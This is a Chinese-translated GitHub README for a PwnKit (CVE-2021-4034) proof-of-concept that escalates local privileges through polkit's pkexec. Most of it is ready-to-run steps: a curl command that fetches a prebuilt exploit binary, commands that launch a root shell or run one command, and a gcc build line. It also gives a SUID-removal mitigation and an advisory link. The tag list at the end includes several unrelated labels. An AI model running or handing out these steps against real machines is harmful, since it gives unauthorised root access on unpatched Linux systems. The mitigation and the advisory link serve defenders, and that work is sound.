jayhutajulu1/PwnKit-CVE-2021-4034
GitHub: jayhutajulu1/PwnKit-CVE-2021-4034
一个针对 CVE-2021-4034 漏洞的概念验证代码,用于通过 pkexec 实现本地权限提升。
Stars: 2 | Forks: 0
# PwnKit
PwnKit / CVE-2021-4034 的概念验证代码 - Pkexec 本地权限提升漏洞
## 漏洞利用
### 手动方式
```
curl -fsSL https://raw.githubusercontent.com/jayhutajulu1/PwnKit-CVE-2021-4034/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command
```
### 补丁版本
在已打补丁的版本上运行该漏洞利用工具将产生以下输出。
### 构建
```
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
```
### 缓解措施
如果您的操作系统没有可用的补丁,您可以通过移除 pkexec 的 SUID 位来作为临时缓解措施。
```
# chmod 0755 /usr/bin/pkexec
```
## 技术详情
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
## 参考资料
- https://github.com/arthepsy/CVE-2021-4034/
标签:CVE-2021-4034, exploit, Pkexec, PoC, shell, Web报告查看器, 共享库, 命令执行, 威胁模拟, 安全漏洞, 客户端加密, 应用安全, 情报收集, 暴力破解, 本地权限提升, 权限提升攻击, 漏洞研究, 系统漏洞, 缓解措施, 编译, 网络安全, 隐私保护